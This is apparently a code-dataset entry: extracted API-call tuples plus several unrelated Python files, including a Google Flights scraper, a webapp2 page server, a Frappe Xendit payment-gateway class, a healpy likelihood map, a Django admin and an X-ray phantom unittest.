'matplotlib.pyplot.xlabel', 'plt.xlabel', (['xname'], {'fontproperties': 'self.font'}), '(xname, fontproperties=self.font)\n', (14513, 14546), True, 'import matplotlib.pyplot as plt\n'), ((14559, 14602), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['yname'], {'fontproperties': 'self.font'}), '(yname, fontproperties=self.font)\n', (14569, 14602), True, 'import matplotlib.pyplot as plt\n'), ((14615, 14660), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""lower right"""', 'prop': 'self.font'}), "(loc='lower right', prop=self.font)\n", (14625, 14660), True, 'import matplotlib.pyplot as plt\n'), ((14687, 14703), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (14696, 14703), True, 'import matplotlib.pyplot as plt\n'), ((14716, 14733), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['xname'], {}), '(xname)\n', (14726, 14733), True, 'import matplotlib.pyplot as plt\n'), ((14746, 14763), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['yname'], {}), '(yname)\n', (14756, 14763), True, 'import matplotlib.pyplot as plt\n'), ((14776, 14805), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""lower right"""'}), "(loc='lower right')\n", (14786, 14805), True, 'import matplotlib.pyplot as plt\n'), ((18928, 18983), 'sklearn.preprocessing.OneHotEncoder', 'OneHotEncoder', ([], {'n_values': 'self._opts._depth', 'sparse': '(False)'}), '(n_values=self._opts._depth, sparse=False)\n', (18941, 18983), False, 'from sklearn.preprocessing import OneHotEncoder\n'), ((26190, 26263), 'numpy.pad', 'np.pad', (['oh_seq_matrix'], {'pad_width': 'npad', 'mode': '"""constant"""', 'constant_values': '(0)'}), "(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)\n", (26196, 26263), True, 'import numpy as np\n'), ((26296, 26327), 'numpy.transpose', 'np.transpose', (['padded_seq_matrix'], {}), '(padded_seq_matrix)\n', (26308, 26327), True, 'import numpy as np\n'), ((30453, 30473), 'random.randint', 'random.randint', (['(0)', '(2)'], {}), '(0, 2)\n', (30467, 30473), False, 'import random\n'), ((30855, 30875), 'random.randint', 'random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (30869, 30875), False, 'import random\n'), ((31251, 31276), 'math.ceil', 'math.ceil', (['(length / AA_nr)'], {}), '(length / AA_nr)\n', (31260, 31276), False, 'import math\n'), ((33204, 33246), 'numpy.random.randint', 'np.random.randint', (['(1)', 'self._opts._nclasses'], {}), '(1, self._opts._nclasses)\n', (33221, 33246), True, 'import numpy as np\n'), ((33308, 33326), 'tensorflow.constant', 'tf.constant', (['label'], {}), '(label)\n', (33319, 33326), True, 'import tensorflow as tf\n'), ((44040, 44095), 'sklearn.preprocessing.OneHotEncoder', 'OneHotEncoder', ([], {'n_values': 'self._opts._depth', 'sparse': '(False)'}), '(n_values=self._opts._depth, sparse=False)\n', (44053, 44095), False, 'from sklearn.preprocessing import OneHotEncoder\n'), ((49630, 49703), 'numpy.pad', 'np.pad', (['oh_seq_matrix'], {'pad_width': 'npad', 'mode': '"""constant"""', 'constant_values': '(0)'}), "(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)\n", (49636, 49703), True, 'import numpy as np\n'), ((49736, 49767), 'numpy.transpose', 'np.transpose', (['padded_seq_matrix'], {}), '(padded_seq_matrix)\n', (49748, 49767), True, 'import numpy as np\n'), ((51381, 51402), 'numpy.ones', 'np.ones', (['[seq_length]'], {}), '([seq_length])\n', (51388, 51402), True, 'import numpy as np\n'), ((51539, 51580), 're.sub', 're.sub', (['"""[\'\\\\[\\\\]\\\\(]"""', '""""""', 'structure_str'], {}), '("[\'\\\\[\\\\]\\\\(]", \'\', structure_str)\n', (51545, 51580), False, 'import re, os\n'), ((52087, 52156), 'numpy.pad', 'np.pad', (['structure'], {'pad_width': 'npad', 'mode': '"""constant"""', 'constant_values': '(0)'}), "(structure, pad_width=npad, mode='constant', constant_values=0)\n", (52093, 52156), True, 'import numpy as np\n'), ((52288, 52324), 'numpy.zeros', 'np.zeros', (['[self._opts._windowlength]'], {}), '([self._opts._windowlength])\n', (52296, 52324), True, 'import numpy as np\n'), ((55502, 55522), 'random.randint', 'random.randint', (['(0)', '(2)'], {}), '(0, 2)\n', (55516, 55522), False, 'import random\n'), ((55854, 55874), 'random.randint', 'random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (55868, 55874), False, 'import random\n'), ((56250, 56275), 'math.ceil', 'math.ceil', (['(length / AA_nr)'], {}), '(length / AA_nr)\n', (56259, 56275), False, 'import math\n'), ((59449, 59487), 'tensorflow.python_io.TFRecordWriter', 'tf.python_io.TFRecordWriter', (['file_path'], {}), '(file_path)\n', (59476, 59487), True, 'import tensorflow as tf\n'), ((68276, 68302), 'tensorflow.name_scope', 'tf.name_scope', (['"""summaries"""'], {}), "('summaries')\n", (68289, 68302), True, 'import tensorflow as tf\n'), ((68323, 68342), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['var'], {}), '(var)\n', (68337, 68342), True, 'import tensorflow as tf\n'), ((68355, 68410), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""mean"""', 'mean'], {'collections': 'collection'}), "('mean', mean, collections=collection)\n", (68372, 68410), True, 'import tensorflow as tf\n'), ((68537, 68596), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""stddev"""', 'stddev'], {'collections': 'collection'}), "('stddev', stddev, collections=collection)\n", (68554, 68596), True, 'import tensorflow as tf\n'), ((68771, 68833), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""histogram"""', 'var'], {'collections': 'collection'}), "('histogram', var, collections=collection)\n", (68791, 68833), True, 'import tensorflow as tf\n'), ((70318, 70338), 'numpy.max', 'np.max', (['y'], {'axis': 'axis'}), '(y, axis=axis)\n', (70324, 70338), True, 'import numpy as np\n'), ((5848, 5900), 'os.path.join', 'os.path.join', (['self._summariesdir', '"""config_dict.JSON"""'], {}), "(self._summariesdir, 'config_dict.JSON')\n", (5860, 5900), False, 'import re, os\n'), ((10399, 10430), 'numpy.reshape', 'np.reshape', (['self.roc_labels', '(-1)'], {}), '(self.roc_labels, -1)\n', (10409, 10430), True, 'import numpy as np\n'), ((10499, 10529), 'numpy.reshape', 'np.reshape', (['self.roc_score', '(-1)'], {}), '(self.roc_score, -1)\n', (10509, 10529), True, 'import numpy as np\n'), ((10685, 10716), 'numpy.reshape', 'np.reshape', (['self.roc_labels', '(-1)'], {}), '(self.roc_labels, -1)\n', (10695, 10716), True, 'import numpy as np\n'), ((10732, 10762), 'numpy.reshape', 'np.reshape', (['self.roc_score', '(-1)'], {}), '(self.roc_score, -1)\n', (10742, 10762), True, 'import numpy as np\n'), ((12546, 12636), 'os.path.join', 'os.path.join', (['self.metrics_path', "(self._opts._name + '.roc_%d' % self.num_calculations)"], {}), "(self.metrics_path, self._opts._name + '.roc_%d' % self.\n num_calculations)\n", (12558, 12636), False, 'import re, os\n'), ((12949, 13045), 'os.path.join', 'os.path.join', (['self.metrics_path', "(self._opts._name + '.precision_%d' % self.num_calculations)"], {}), "(self.metrics_path, self._opts._name + '.precision_%d' % self.\n num_calculations)\n", (12961, 13045), False, 'import re, os\n'), ((25533, 25591), 'numpy.ndarray', 'np.ndarray', ([], {'shape': 'self._opts._windowlength', 'dtype': 'np.int32'}), '(shape=self._opts._windowlength, dtype=np.int32)\n', (25543, 25591), True, 'import numpy as np\n'), ((31990, 32014), 'numpy.reshape', 'np.reshape', (['seq', '(1, -1)'], {}), '(seq, (1, -1))\n', (32000, 32014), True, 'import numpy as np\n'), ((33449, 33480), 'tensorflow.cast', 'tf.cast', (['label_tensor', 'tf.int32'], {}), '(label_tensor, tf.int32)\n', (33456, 33480), True, 'import tensorflow as tf\n'), ((37722, 37735), 'numpy.float32', 'np.float32', (['l'], {}), '(l)\n', (37732, 37735), True, 'import numpy as np\n'), ((39928, 39986), 'math.ceil', 'math.ceil', (['(self._opts._batchsize * self.garbage_percentage)'], {}), '(self._opts._batchsize * self.garbage_percentage)\n', (39937, 39986), False, 'import math\n'), ((48936, 48994), 'numpy.ndarray', 'np.ndarray', ([], {'shape': 'self._opts._windowlength', 'dtype': 'np.int32'}), '(shape=self._opts._windowlength, dtype=np.int32)\n', (48946, 48994), True, 'import numpy as np\n'), ((56989, 57013), 'numpy.reshape', 'np.reshape', (['seq', '(1, -1)'], {}), '(seq, (1, -1))\n', (56999, 57013), True, 'import numpy as np\n'), ((57421, 57454), 'tensorflow.train.BytesList', 'tf.train.BytesList', ([], {'value': '[value]'}), '(value=[value])\n', (57439, 57454), True, 'import tensorflow as tf\n'), ((57537, 57570), 'tensorflow.train.FloatList', 'tf.train.FloatList', ([], {'value': '[value]'}), '(value=[value])\n', (57555, 57570), True, 'import tensorflow as tf\n'), ((57653, 57686), 'tensorflow.train.Int64List', 'tf.train.Int64List', ([], {'value': '[value]'}), '(value=[value])\n', (57671, 57686), True, 'import tensorflow as tf\n'), ((58583, 58622), 'os.path.basename', 'os.path.basename', (['self._opts._traindata'], {}), '(self._opts._traindata)\n', (58599, 58622), False, 'import re, os\n'), ((58897, 58936), 'os.path.basename', 'os.path.basename', (['self._opts._validdata'], {}), '(self._opts._validdata)\n', (58913, 58936), False, 'import re, os\n'), ((68428, 68451), 'tensorflow.name_scope', 'tf.name_scope', (['"""stddev"""'], {}), "('stddev')\n", (68441, 68451), True, 'import tensorflow as tf\n'), ((68634, 68652), 'tensorflow.reduce_max', 'tf.reduce_max', (['var'], {}), '(var)\n', (68647, 68652), True, 'import tensorflow as tf\n'), ((68715, 68733), 'tensorflow.reduce_min', 'tf.reduce_min', (['var'], {}), '(var)\n', (68728, 68733), True, 'import tensorflow as tf\n'), ((25949, 25980), 'numpy.reshape', 'np.reshape', (['seq_matrix', '(1, -1)'], {}), '(seq_matrix, (1, -1))\n', (25959, 25980), True, 'import numpy as np\n'), ((31082, 31103), 'random.randint', 'random.randint', (['(0)', '(19)'], {}), '(0, 19)\n', (31096, 31103), False, 'import random\n'), ((31549, 31570), 'random.randint', 'random.randint', (['(0)', '(19)'], {}), '(0, 19)\n', (31563, 31570), False, 'import random\n'), ((31677, 31698), 'random.randint', 'random.randint', (['(0)', '(19)'], {}), '(0, 19)\n', (31691, 31698), False, 'import random\n'), ((49352, 49383), 'numpy.reshape', 'np.reshape', (['seq_matrix', '(1, -1)'], {}), '(seq_matrix, (1, -1))\n', (49362, 49383), True, 'import numpy as np\n'), ((56081, 56102), 'random.randint', 'random.randint', (['(0)', '(19)'], {}), '(0, 19)\n', (56095, 56102), False, 'import random\n'), ((56548, 56569), 'random.randint', 'random.randint', (['(0)', '(19)'], {}), '(0, 19)\n', (56562, 56569), False, 'import random\n'), ((56676, 56697), 'random.randint', 'random.randint', (['(0)', '(19)'], {}), '(0, 19)\n', (56690, 56697), False, 'import random\n'), ((59353, 59407), 'os.path.join', 'os.path.join', (['self._opts._batchesdir', 'batch_files_name'], {}), '(self._opts._batchesdir, batch_files_name)\n', (59365, 59407), False, 'import re, os\n'), ((59833, 59869), 'numpy.zeros', 'np.zeros', (['[self._opts._windowlength]'], {}), '([self._opts._windowlength])\n', (59841, 59869), True, 'import numpy as np\n'), ((62176, 62191), 'numpy.asarray', 'np.asarray', (['[0]'], {}), '([0])\n', (62186, 62191), True, 'import numpy as np\n'), ((62246, 62283), 'numpy.expand_dims', 'np.expand_dims', (['garbage_label'], {'axis': '(0)'}), '(garbage_label, axis=0)\n', (62260, 62283), True, 'import numpy as np\n'), ((68501, 68522), 'tensorflow.square', 'tf.square', (['(var - mean)'], {}), '(var - mean)\n', (68510, 68522), True, 'import tensorflow as tf\n')]
#!/usr/bin/env python3 from time import sleep import datetime from selenium import webdriver from bs4 import BeautifulSoup import sqlite3 DATEFORMAT = '%Y-%m-%d' def buildQueryURL(fr, to, date, currency): url = 'https://www.google.com/flights?hl=se&gl=se#flt={fr}.{to}.{date};c:{currency};e:1;s:0;sd:1;t:f;tt:o' url = url.format(fr = fr, to = to, date = date, currency = currency) return url def getHTML(url): options = webdriver.ChromeOptions() options.add_argument('headless') options.add_argument('no-sandbox') driver = webdriver.Chrome(chrome_options = options) driver.get(url) sleep(2) html = driver.page_source driver.quit() return html def parseFlights(html, date): def parsePrice(price): return ''.join([i for i in price if i.isdigit()]) def parseTimes(times, date): return [datetime.datetime.strptime(date + '-' + time.strip(), DATEFORMAT + '-%H:%M') for time in times.split('–')] flightsSoup = BeautifulSoup(html, features = 'html.parser') for flight in flightsSoup.find_all('li', class_ = 'gws-flights-results__result-item'): times = parseTimes(flight.find('div', class_ = 'gws-flights-results__times').text, date) priceObj = flight.find('div', class_ = 'gws-flights-results__price') yield { 'flightId': flight['data-fp'], 'flightDate': datetime.datetime.strptime(date, DATEFORMAT), 'departure': times[0], 'arrival': times[1], 'duration': flight.find('div', class_ = 'gws-flights-results__duration').text, 'price': -1 if (priceObj is None) else parsePrice(priceObj.text), 'timestamp': datetime.datetime.now() } def connectDB(dbName): db = sqlite3.connect(dbName) cur = db.cursor() cur.execute(''' CREATE TABLE IF NOT EXISTS flights( id INTEGER PRIMARY KEY AUTOINCREMENT, flightId TEXT, flightDate DATETIME, departure DATETIME, arrival DATETIME, duration TEXT, price INTEGER, timestamp DATETIME) ''') db.commit() return db def writeFlights(db, flights): cur = db.cursor() for flight in flights: print('Writing to db...\n', flight) cur.execute(''' INSERT INTO flights(flightId, flightDate, departure, arrival, duration, price, timestamp) VALUES(:flightId, :flightDate, :departure, :arrival, :duration, :price, :timestamp) ''', flight) db.commit() def main(): dateRange = [datetime.datetime.now().strftime(DATEFORMAT), '2020-12-31'] dateRangeDateFormat = [datetime.datetime.strptime(date, DATEFORMAT) for date in dateRange] currentDate = dateRangeDateFormat[0] while (currentDate <= dateRangeDateFormat[1]): date = currentDate.strftime(DATEFORMAT) url = buildQueryURL('ARN', 'FRA', date, 'SEK') print('Scraping', url) html = getHTML(url) flights = parseFlights(html, date) db = connectDB('./db/flights.sqlite') with db: writeFlights(db, flights) currentDate += datetime.timedelta(days = 1) if __name__ == '__main__': main()
[ "selenium.webdriver.ChromeOptions", "sqlite3.connect", "datetime.datetime.strptime", "selenium.webdriver.Chrome", "time.sleep", "bs4.BeautifulSoup", "datetime.datetime.now", "datetime.timedelta" ]
[((434, 459), 'selenium.webdriver.ChromeOptions', 'webdriver.ChromeOptions', ([], {}), '()\n', (457, 459), False, 'from selenium import webdriver\n'), ((543, 583), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {'chrome_options': 'options'}), '(chrome_options=options)\n', (559, 583), False, 'from selenium import webdriver\n'), ((606, 614), 'time.sleep', 'sleep', (['(2)'], {}), '(2)\n', (611, 614), False, 'from time import sleep\n'), ((953, 996), 'bs4.BeautifulSoup', 'BeautifulSoup', (['html'], {'features': '"""html.parser"""'}), "(html, features='html.parser')\n", (966, 996), False, 'from bs4 import BeautifulSoup\n'), ((1662, 1685), 'sqlite3.connect', 'sqlite3.connect', (['dbName'], {}), '(dbName)\n', (1677, 1685), False, 'import sqlite3\n'), ((2481, 2525), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['date', 'DATEFORMAT'], {}), '(date, DATEFORMAT)\n', (2507, 2525), False, 'import datetime\n'), ((2928, 2954), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(1)'}), '(days=1)\n', (2946, 2954), False, 'import datetime\n'), ((1323, 1367), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['date', 'DATEFORMAT'], {}), '(date, DATEFORMAT)\n', (1349, 1367), False, 'import datetime\n'), ((1601, 1624), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1622, 1624), False, 'import datetime\n'), ((2396, 2419), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2417, 2419), False, 'import datetime\n')]
import os import re import jinja2 import webapp2 JINJA_ENVIRONMENT = jinja2.Environment( loader=jinja2.FileSystemLoader(os.path.dirname(__file__)), extensions=['jinja2.ext.autoescape'], variable_start_string='{{{{', variable_end_string='}}}}', autoescape=True) redirects = [ (r'/api/([^/]*)/lit_html', r'/api/\1/_lit_html_'), (r'/api/([^/]*)/shady_render', r'/api/\1/_lib_shady_render_') ] # Match HTML pages from path; similar to behavior of Jekyll on GitHub Pages. def find_template(path): if path.endswith('/'): # / -> /index.html, /try/ -> /try/index.html return JINJA_ENVIRONMENT.get_template(path + 'index.html') elif path.endswith('.html'): # /index.html, /try/create.html return JINJA_ENVIRONMENT.get_template(path) try: # /try/create -> /try/create.html return JINJA_ENVIRONMENT.get_template(path + '.html') except jinja2.exceptions.TemplateNotFound: pass # /try -> /try/index.html return JINJA_ENVIRONMENT.get_template(path + '/index.html') class MainPage(webapp2.RequestHandler): def get(self): try: template = find_template(self.request.path) self.response.headers['Cache-Control'] = 'public, max-age=60' except jinja2.exceptions.TemplateNotFound: template = find_template('/404.html') self.response.set_status(404) except Exception: template = find_template('/500.html') self.response.set_status(500) self.response.write(template.render({})) # Serve redirects for old paths, otherwise just serve static files class ApiDoc(webapp2.RequestHandler): def redirect_if_needed(self, path): for redirect in redirects: pattern = redirect[0] replace = redirect[1] if re.match(pattern, path): self.redirect(re.sub(pattern, replace, path), permanent=True) return True return False def get(self): if self.redirect_if_needed(self.request.path): return try: # path is always absolute starting with /api/. Slice off the leading slash # and normalize it relative to cwd filepath = os.path.relpath(self.request.path[1:]) page = open(filepath, 'rb').read() self.response.write(page) except Exception: template = find_template('/404.html') self.response.set_status(404) self.response.write(template.render({})) app = webapp2.WSGIApplication([ ('/api/.*', ApiDoc), ('/.*', MainPage), ])
[ "re.match", "os.path.dirname", "webapp2.WSGIApplication", "re.sub", "os.path.relpath" ]
[((2340, 2405), 'webapp2.WSGIApplication', 'webapp2.WSGIApplication', (["[('/api/.*', ApiDoc), ('/.*', MainPage)]"], {}), "([('/api/.*', ApiDoc), ('/.*', MainPage)])\n", (2363, 2405), False, 'import webapp2\n'), ((123, 148), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (138, 148), False, 'import os\n'), ((1708, 1731), 're.match', 're.match', (['pattern', 'path'], {}), '(pattern, path)\n', (1716, 1731), False, 'import re\n'), ((2071, 2109), 'os.path.relpath', 'os.path.relpath', (['self.request.path[1:]'], {}), '(self.request.path[1:])\n', (2086, 2109), False, 'import os\n'), ((1755, 1785), 're.sub', 're.sub', (['pattern', 'replace', 'path'], {}), '(pattern, replace, path)\n', (1761, 1785), False, 'import re\n')]
# Copyright (c) 2022, kinkusuma and contributors # For license information, please see license.txt import frappe from frappe.model.document import Document from frappe import _ import json from urllib.parse import urlencode from frappe.utils import get_url, call_hook_method, cint, flt from frappe.integrations.utils import make_get_request, make_post_request, create_request_log, create_payment_gateway class xenditsettings(Document): supported_currency = 'IDR' def on_update(self): create_payment_gateway('Xendit-' + self.gateway_name, settings='Xendit Settings', controller=self.gateway_name) call_hook_method('payment_gateway_enabled', gateway='Xendit-' + self.gateway_name) def validate_transaction_currency(self, currency): if currency != self.supported_currency: frappe.throw(_("Currency '{0}' is not supported").format(currency)) def get_payment_url(self, **kwargs): return get_url("./xendit/checkout?{0}".format(urlencode(kwargs))) def get_gateway_controller(doctype, docname): reference_doc = frappe.get_doc(doctype, docname) gateway_controller = frappe.db.get_value("Payment Gateway", reference_doc.payment_gateway, "gateway_controller") return gateway_controller
[ "frappe.db.get_value", "frappe._", "frappe.utils.call_hook_method", "frappe.get_doc", "urllib.parse.urlencode", "frappe.integrations.utils.create_payment_gateway" ]
[((1025, 1057), 'frappe.get_doc', 'frappe.get_doc', (['doctype', 'docname'], {}), '(doctype, docname)\n', (1039, 1057), False, 'import frappe\n'), ((1080, 1175), 'frappe.db.get_value', 'frappe.db.get_value', (['"""Payment Gateway"""', 'reference_doc.payment_gateway', '"""gateway_controller"""'], {}), "('Payment Gateway', reference_doc.payment_gateway,\n 'gateway_controller')\n", (1099, 1175), False, 'import frappe\n'), ((491, 607), 'frappe.integrations.utils.create_payment_gateway', 'create_payment_gateway', (["('Xendit-' + self.gateway_name)"], {'settings': '"""Xendit Settings"""', 'controller': 'self.gateway_name'}), "('Xendit-' + self.gateway_name, settings=\n 'Xendit Settings', controller=self.gateway_name)\n", (513, 607), False, 'from frappe.integrations.utils import make_get_request, make_post_request, create_request_log, create_payment_gateway\n'), ((605, 692), 'frappe.utils.call_hook_method', 'call_hook_method', (['"""payment_gateway_enabled"""'], {'gateway': "('Xendit-' + self.gateway_name)"}), "('payment_gateway_enabled', gateway='Xendit-' + self.\n gateway_name)\n", (621, 692), False, 'from frappe.utils import get_url, call_hook_method, cint, flt\n'), ((941, 958), 'urllib.parse.urlencode', 'urlencode', (['kwargs'], {}), '(kwargs)\n', (950, 958), False, 'from urllib.parse import urlencode\n'), ((799, 835), 'frappe._', '_', (['"""Currency \'{0}\' is not supported"""'], {}), '("Currency \'{0}\' is not supported")\n', (800, 835), False, 'from frappe import _\n')]
""" LMap - a skymap of likelihoods. The map will stored in self.map, and is in nested order. """ import logging import numbers import collections import numpy as np import healpy as hp class LMap: def __init__(self, a=0): if isinstance(a, numbers.Number): if a == 0: self.map = np.ones(hp.nside2npix(2)) # placeholder else: # interpret as nside self.map = np.ones(hp.nside2npix(a)) elif isinstance(a, (collections.Sequence, np.ndarray)): self.map = np.array(a) else: logging.error('LMap.__init__: unrecognized type') self.map = np.ones(hp.nside2npix(2)) # placeholder def clear(self): self.map = np.ones(len(self.map)) def copy(self): return LMap(self.map.copy()) def combine(self, other): if len(self.map) > len(other): nside = hp.npix2nside(len(self.map)) ma = hp.ud_grade(np.array(other), nside, order_in='NESTED', outer_out='NESTED') elif len(self.map) < len(other): nside = hp.npix2nside(len(other)) self.map = hp.ud_grade(np.array(self.map), nside, order_in='NESTED', outer_out='NESTED') ma = other else: ma = np.array(other) self.map *= ma
[ "numpy.array", "logging.error", "healpy.nside2npix" ]
[((503, 514), 'numpy.array', 'np.array', (['a'], {}), '(a)\n', (511, 514), True, 'import numpy as np\n'), ((531, 580), 'logging.error', 'logging.error', (['"""LMap.__init__: unrecognized type"""'], {}), "('LMap.__init__: unrecognized type')\n", (544, 580), False, 'import logging\n'), ((878, 893), 'numpy.array', 'np.array', (['other'], {}), '(other)\n', (886, 893), True, 'import numpy as np\n'), ((1203, 1218), 'numpy.array', 'np.array', (['other'], {}), '(other)\n', (1211, 1218), True, 'import numpy as np\n'), ((308, 324), 'healpy.nside2npix', 'hp.nside2npix', (['(2)'], {}), '(2)\n', (321, 324), True, 'import healpy as hp\n'), ((408, 424), 'healpy.nside2npix', 'hp.nside2npix', (['a'], {}), '(a)\n', (421, 424), True, 'import healpy as hp\n'), ((606, 622), 'healpy.nside2npix', 'hp.nside2npix', (['(2)'], {}), '(2)\n', (619, 622), True, 'import healpy as hp\n'), ((1070, 1088), 'numpy.array', 'np.array', (['self.map'], {}), '(self.map)\n', (1078, 1088), True, 'import numpy as np\n')]
import os def ensure_dir(path): if not os.path.exists(path): os.makedirs(path) def get_instance(module, name, config, *args): return getattr(module, config[name]['type'])(*args, **config[name]['args']) def freeze_network(network): for p in network.parameters(): p.requires_grad = False def unfreeze_network(network): for p in network.parameters(): p.requires_grad = True
[ "os.path.exists", "os.makedirs" ]
[((45, 65), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (59, 65), False, 'import os\n'), ((75, 92), 'os.makedirs', 'os.makedirs', (['path'], {}), '(path)\n', (86, 92), False, 'import os\n')]
from django.contrib import admin from modeltranslation.admin import TabbedTranslationAdmin from .models import Person, Office, Tag class PersonAdmin(TabbedTranslationAdmin): list_display = ('name', 'surname', 'security_level', 'gender') list_filter = ('security_level', 'tags', 'office', 'name', 'gender') actions = ['copy_100'] def copy_100(self, request, queryset): for item in queryset.all(): item.populate() copy_100.short_description = 'Copy 100 objects with random data' class PersonStackedInline(admin.TabularInline): model = Person extra = 0 class OfficeAdmin(admin.ModelAdmin): inlines = (PersonStackedInline,) list_display = ('office', 'address') class TagAdmin(admin.ModelAdmin): list_display = ('name',) admin.site.register(Person, PersonAdmin) admin.site.register(Office, OfficeAdmin) admin.site.register(Tag, TagAdmin)
[ "django.contrib.admin.site.register" ]
[((791, 831), 'django.contrib.admin.site.register', 'admin.site.register', (['Person', 'PersonAdmin'], {}), '(Person, PersonAdmin)\n', (810, 831), False, 'from django.contrib import admin\n'), ((832, 872), 'django.contrib.admin.site.register', 'admin.site.register', (['Office', 'OfficeAdmin'], {}), '(Office, OfficeAdmin)\n', (851, 872), False, 'from django.contrib import admin\n'), ((873, 907), 'django.contrib.admin.site.register', 'admin.site.register', (['Tag', 'TagAdmin'], {}), '(Tag, TagAdmin)\n', (892, 907), False, 'from django.contrib import admin\n')]
#!/usr/bin/python3 from __future__ import absolute_import, division, print_function import six import context import unittest from acsemble.phantom import Phantom2d from acsemble import maia from acsemble import projection import os import numpy as np from acsemble import config def setup_module(): config.config_init() PATH_HERE = os.path.abspath(os.path.dirname(__file__)) GOLOSIO_MAP = os.path.join(PATH_HERE, '..', 'acsemble', 'data', 'golosio_100.png') YAMLFILE = os.path.join(PATH_HERE, '..', 'acsemble', 'data', 'golosio.yaml') class OutgoingPhotonEnergyTests(unittest.TestCase): def setUp(self): self.phantom = Phantom2d(filename=GOLOSIO_MAP, yamlfile=YAMLFILE) self.maia_d = maia.Maia() def test_fluoro(self): energy = projection.outgoing_photon_energy( event_type = 'fluoro', p = self.phantom, q = 199, # outer corner maia_d = self.maia_d, el = 'Fe' # K_alpha is 6.398 ) self.assertAlmostEqual(energy, 6.398, places=2) @unittest.skip def test_rayleigh(self): energy = projection.outgoing_photon_energy( event_type = 'rayleigh', p = self.phantom, q = 199, # outer corner maia_d=self.maia_d, ) self.assertAlmostEqual(energy, self.phantom.energy) @unittest.skip def test_compton(self): energy_outer = projection.outgoing_photon_energy( event_type = 'compton', p = self.phantom, q = 199, # outer corner maia_d=self.maia_d, ) energy_inner = projection.outgoing_photon_energy( event_type = 'compton', p = self.phantom, q = 248, # inner corner maia_d=self.maia_d, ) self.assertTrue(energy_outer > energy_inner) # because backscatter self.assertTrue(energy_outer < self.phantom.energy) # self.assertAlmostEqual(energy_outer, 14.324, places=3) # Maia Rev A self.assertAlmostEqual(energy_outer, 14.282, places=3) # For Maia Rev C def tearDown(self): del self.phantom del self.maia_d if __name__ == "__main__" : import sys from numpy.testing import run_module_suite run_module_suite(argv=sys.argv)
[ "os.path.join", "acsemble.config.config_init", "acsemble.maia.Maia", "os.path.dirname", "acsemble.phantom.Phantom2d", "numpy.testing.run_module_suite", "acsemble.projection.outgoing_photon_energy" ]
[((397, 465), 'os.path.join', 'os.path.join', (['PATH_HERE', '""".."""', '"""acsemble"""', '"""data"""', '"""golosio_100.png"""'], {}), "(PATH_HERE, '..', 'acsemble', 'data', 'golosio_100.png')\n", (409, 465), False, 'import os\n'), ((477, 542), 'os.path.join', 'os.path.join', (['PATH_HERE', '""".."""', '"""acsemble"""', '"""data"""', '"""golosio.yaml"""'], {}), "(PATH_HERE, '..', 'acsemble', 'data', 'golosio.yaml')\n", (489, 542), False, 'import os\n'), ((305, 325), 'acsemble.config.config_init', 'config.config_init', ([], {}), '()\n', (323, 325), False, 'from acsemble import config\n'), ((356, 381), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (371, 381), False, 'import os\n'), ((2308, 2339), 'numpy.testing.run_module_suite', 'run_module_suite', ([], {'argv': 'sys.argv'}), '(argv=sys.argv)\n', (2324, 2339), False, 'from numpy.testing import run_module_suite\n'), ((641, 691), 'acsemble.phantom.Phantom2d', 'Phantom2d', ([], {'filename': 'GOLOSIO_MAP', 'yamlfile': 'YAMLFILE'}), '(filename=GOLOSIO_MAP, yamlfile=YAMLFILE)\n', (650, 691), False, 'from acsemble.phantom import Phantom2d\n'), ((714, 725), 'acsemble.maia.Maia', 'maia.Maia', ([], {}), '()\n', (723, 725), False, 'from acsemble import maia\n'), ((771, 882), 'acsemble.projection.outgoing_photon_energy', 'projection.outgoing_photon_energy', ([], {'event_type': '"""fluoro"""', 'p': 'self.phantom', 'q': '(199)', 'maia_d': 'self.maia_d', 'el': '"""Fe"""'}), "(event_type='fluoro', p=self.phantom, q=\n 199, maia_d=self.maia_d, el='Fe')\n", (804, 882), False, 'from acsemble import projection\n'), ((1127, 1231), 'acsemble.projection.outgoing_photon_energy', 'projection.outgoing_photon_energy', ([], {'event_type': '"""rayleigh"""', 'p': 'self.phantom', 'q': '(199)', 'maia_d': 'self.maia_d'}), "(event_type='rayleigh', p=self.phantom, q=\n 199, maia_d=self.maia_d)\n", (1160, 1231), False, 'from acsemble import projection\n'), ((1445, 1548), 'acsemble.projection.outgoing_photon_energy', 'projection.outgoing_photon_energy', ([], {'event_type': '"""compton"""', 'p': 'self.phantom', 'q': '(199)', 'maia_d': 'self.maia_d'}), "(event_type='compton', p=self.phantom, q=\n 199, maia_d=self.maia_d)\n", (1478, 1548), False, 'from acsemble import projection\n'), ((1654, 1757), 'acsemble.projection.outgoing_photon_energy', 'projection.outgoing_photon_energy', ([], {'event_type': '"""compton"""', 'p': 'self.phantom', 'q': '(248)', 'maia_d': 'self.maia_d'}), "(event_type='compton', p=self.phantom, q=\n 248, maia_d=self.maia_d)\n", (1687, 1757), False, 'from acsemble import projection\n')]
